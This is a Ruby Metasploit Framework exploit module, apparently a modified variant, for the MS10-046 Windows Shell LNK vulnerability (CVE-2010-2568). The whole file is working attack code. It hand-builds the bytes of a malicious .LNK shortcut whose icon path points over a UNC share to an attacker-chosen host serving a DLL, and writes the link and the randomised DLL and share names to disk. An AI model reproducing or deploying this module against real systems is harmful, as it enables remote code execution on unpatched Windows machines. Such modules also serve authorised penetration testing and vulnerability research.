##
# $Id: ms10_046_generate_shortcut_icon_dllloader.rb 10404 2010-10-03 01:19:30Z XPO $
# original $Id: ms10_046_shortcut_icon_dllloader.rb 10404 2010-09-21 00:13:30Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking

   def initialize(info = {})
      super(update_info(info,
      'Name'			=> 'Generate Local Microsoft Windows Shell LNK file',
      'Description'	=> %q{
         This module exploits a vulnerability in the handling of Windows
         Shortcut files (.LNK) that contain an icon resource pointing to a
         malicious DLL. This module creates a local .LNK file.
      },
      'Author'		=>
      [
         'XPO',    # Generate local .lnk file
         'hdm',   # Module itself
         'jduck', # WebDAV implementation, UNCHOST var
         'B_H'    # Clean LNK template
      ],
      'License'		=> MSF_LICENSE,
      'Version'		=> '$Revision: 10404 $',
      'References'	=>
      [
         ['CVE', '2010-2568'],
         ['OSVDB', '66387'],
         ['MSB', 'MS10-046'],
         ['URL', 'http://www.microsoft.com/technet/security/advisory/2286198.mspx']
      ],
      'DefaultOptions' =>
      {
         'EXITFUNC' => 'process',
      },
      'Payload'		=>
      {
         'Space'	=> 2048,
      },
      'Platform'		=> 'win',
      'Targets'		=>
      [
         [ 'Automatic',	{ } ]
      ],
      'DisclosureDate' => 'Jul 16 2010',
      'DefaultTarget'  => 0))

      register_options(
      [
         OptString.new(	'URIPATH',		 [ true,  "The URI to use (do not change).", "/" ]),
         OptString.new( 'UNCHOST',      [ false, "The host portion of the UNC path to provide to clients (ex: 1.2.3.4)." ])
      ], self.class)

      deregister_options('SSL', 'SSLVersion') # Just for now
   end

   def generate_link(unc)
      uni_unc = unc.unpack("C*").pack("v*")
      path = ''
      path << [
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00
      ].pack("C*")
      path << uni_unc

      # LinkHeader
      ret = [
         0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
      ].pack('C*')

      idlist_data = ''
      idlist_data << [0x12 + 2].pack('v')
      idlist_data << [
         0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,
         0x30, 0x9d
      ].pack('C*')
      idlist_data << [0x12 + 2].pack('v')
      idlist_data << [
         0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,
         0x30, 0x9d
      ].pack('C*')
      idlist_data << [path.length + 2].pack('v')
      idlist_data << path
      idlist_data << [0x00].pack('v') # TERMINAL WOO

      # LinkTargetIDList
      ret << [idlist_data.length].pack('v') # IDListSize
      ret << idlist_data

      # ExtraData blocks (none)
      ret << [rand(4)].pack('V')

      # Patch in the LinkFlags
      ret[0x14, 4] = ["10000001000000000000000000000000".to_i(2)].pack('N')
      ret
   end

   def exploit

      unc = "\\\\"
      randunc = rand_text_alpha(rand(8)+4)
      if (datastore['UNCHOST'])
         unc << datastore['UNCHOST'].dup
      else
         unc << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
      end
      unc << "\\"
      unc << randunc
      unc << "\\"

      @exploit_unc  = unc

      randdll = rand_text_alpha(rand(8)+4)
      randlnk = rand_text_alpha(rand(8)+4)

      @exploit_lnk  = randlnk + ".lnk"
      @exploit_dll  = randdll + ".dll"

      data = generate_link("#{@exploit_unc}#{@exploit_dll}")

      ::File.open(::File.join(Msf::Config.data_directory, "lnkname"), "r").each_line do |lnk|
         @lnkname = lnk
      end
      ::File.open(::File.join(Msf::Config.data_directory, @lnkname), "wb") do |fd|
         fd.write(data)
      end
      ::File.open(::File.join(Msf::Config.data_directory, "randdll"), "wb") do |fd|
         fd.write(@exploit_dll)
      end
      ::File.open(::File.join(Msf::Config.data_directory, "randunc"), "wb") do |fd|
         fd.write(@exploit_unc)
      end
      ::File.open(::File.join(Msf::Config.data_directory, "randlnk"), "wb") do |fd|
         fd.write(@exploit_lnk)
      end

   end
end
